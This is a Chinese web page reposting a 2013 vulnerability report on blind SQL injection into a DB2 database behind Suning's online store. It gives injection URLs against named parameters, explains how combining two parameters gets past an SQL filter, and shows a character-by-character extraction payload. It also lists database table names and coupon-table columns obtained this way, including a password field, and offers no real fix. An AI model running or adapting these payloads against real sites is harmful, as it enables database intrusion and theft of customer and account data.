当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

苏宁易购某DB2盲注

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

初始访问:
https://www.suning.com/emall/SNNetStoreView?storeId=11554&catalogId=10654&langId=-7&from=index&storeType=0&storeName=&reqProvince=&reqCity=
 
注入地址:
https://www.suning.com/emall/SNNetStoreInfoView?cityId1=9137&dist1=aa%27or%201=1/*&storeName=*/--
 
注入参数:dist1 和storeName ,结合,绕过SQL防注。
 
如盲注猜解:
https://www.suning.com/emall/SNNetStoreInfoView?cityId1=9137&storeName=*/from%20syscat.schemata%20fetch%20first%201%20rows%20only%29,1,1%29%29%3E10--&dist1=aa%27or%20ascii%28SUBSTR%28%28select%20schemaname/*
 
 
 
不知道用户名在不在了,涛涛电脑知识网,盲注,www.xuhantao.com,猜解比较慢。下面是简单猜解的一些表什么的。
 
 
漏洞证明:盲注猜解:
'ADVISE_INDEX','ADVISE_WORKLOAD','DMUSERBHVR','GRUSERAUTH','ORDUSERS','USERDEMO','USERLOCK','USERPROF','USERPVCDEV','USERPWDHST','USERREG','USERS','USER_QA','XACTJOINUSER','XGPUSERREL','XIPUSERS','XMEMBERCARDUSERS','XROULETTEUSERCOUNT','XROULETTEUSERS','XSECKILLUSERREL','XSENDUSERS','XSENDUSERS_BAK','XSMARTUSERCOUNT','XTMPUSERS','XUSERGRADE','XUSERGRADECONF','XUSERPREFER','ZST_USER','ZST_USER_ROLE','USEROPTIONS','SYSUSERAUTH','SYSUSEROPTIONS'
 
表:XCOUPON (优惠券)
'CHARGEDATE','CODE','COUPONGROUP_ID','COUPONTMP_ID','COUPON_ID','COUPON_NO','COUPON_TYPE','CREATED_BY','CREATED_DATE','DELIVERDATE','DESCRIPTION','ENDDATE','FIELD1','FIELD2','FIELD3','LAST_UPDATED','LEVEL','MARKFORDELETE','NAME','NOTES','OPTCOUNTER','ORDERS_ID','PAR_VALUE','PASSWORD','REMAININGAMOUNT','SERIALNUMBER','SOURCE_ID','SOURCE_TYPE','STARTDATE','STATUS','UPDATED_BY','USERS_ID'
 
 
修复方案:
 
你懂得!
 

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1